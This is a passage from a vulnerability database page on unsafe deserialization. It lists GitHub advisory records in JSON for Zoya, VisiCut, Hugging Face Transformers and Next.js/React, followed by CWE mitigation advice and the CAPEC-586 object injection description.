      "url": "http://www.openwall.com/lists/oss-security/2016/12/31/1"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/539975/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/95168"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1037541"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QFQ-RW3C-8X7P

Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35
VLAI
Details

Unauthenticated PHP Object Injection in Zoya <= 1.4 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-40756"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-17T14:17:52Z",
    "severity": "HIGH"
  },
  "details": "Unauthenticated PHP Object Injection in Zoya \u003c= 1.4 versions.",
  "id": "GHSA-9qfq-rw3c-8x7p",
  "modified": "2026-06-17T18:35:55Z",
  "published": "2026-06-17T18:35:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40756"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/theme/zoya/vulnerability/wordpress-zoya-theme-1-4-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QJM-V45H-7FXQ

Vulnerability from github – Published: 2025-03-10 18:31 – Updated: 2025-03-12 21:31
VLAI
Details

VisiCut 2.1 allows code execution via Insecure XML Deserialization in the loadPlfFile method of VisicutModel.java.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-25940"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-10T16:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "VisiCut 2.1 allows code execution via Insecure XML Deserialization in the loadPlfFile method of VisicutModel.java.",
  "id": "GHSA-9qjm-v45h-7fxq",
  "modified": "2025-03-12T21:31:28Z",
  "published": "2025-03-10T18:31:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25940"
    },
    {
      "type": "WEB",
      "url": "https://github.com/t-oster/VisiCut"
    },
    {
      "type": "WEB",
      "url": "https://royblume.github.io/CVE-2025-25940"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QM5-HQG9-J2FX

Vulnerability from github – Published: 2025-12-23 21:30 – Updated: 2025-12-23 21:30
VLAI
Details

Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14930"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-23T21:15:48Z",
    "severity": "HIGH"
  },
  "details": "Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309.",
  "id": "GHSA-9qm5-hqg9-j2fx",
  "modified": "2025-12-23T21:30:29Z",
  "published": "2025-12-23T21:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14930"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1145"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9QR9-H5GF-34MP

Vulnerability from github – Published: 2025-12-03 19:07 – Updated: 2025-12-11 19:31
VLAI
Summary
Next.js is vulnerable to RCE in React flight protocol
Details

A vulnerability affects certain React packages1 for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as CVE-2025-55182.

Fixed in: React: 19.0.1, 19.1.2, 19.2.1 Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+

The vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.

All users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.

1 The affected React packages are: - react-server-dom-parcel - react-server-dom-turbopack - react-server-dom-webpack

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "14.3.0-canary.77"
            },
            {
              "fixed": "15.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.1.0-canary.0"
            },
            {
              "fixed": "15.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.2.0-canary.0"
            },
            {
              "fixed": "15.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.3.0-canary.0"
            },
            {
              "fixed": "15.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.4.0-canary.0"
            },
            {
              "fixed": "15.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.5.0-canary.0"
            },
            {
              "fixed": "15.5.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "16.0.0-canary.0"
            },
            {
              "fixed": "16.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-03T19:07:11Z",
    "nvd_published_at": "2025-12-03T18:15:47Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability affects certain React packages\u003csup\u003e1\u003c/sup\u003e for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55182](https://www.cve.org/CVERecord?id=CVE-2025-55182). \n\nFixed in:\nReact: 19.0.1, 19.1.2, 19.2.1\nNext.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+\n\nThe vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.\n\nAll users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.\n\n\u003csup\u003e1\u003c/sup\u003e The affected React packages are:\n- react-server-dom-parcel\n- react-server-dom-turbopack\n- react-server-dom-webpack",
  "id": "GHSA-9qr9-h5gf-34mp",
  "modified": "2025-12-11T19:31:04Z",
  "published": "2025-12-03T19:07:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-fmh4-wr37-44fp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55182"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vercel/next.js"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Next.js is vulnerable to RCE in React flight protocol"
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.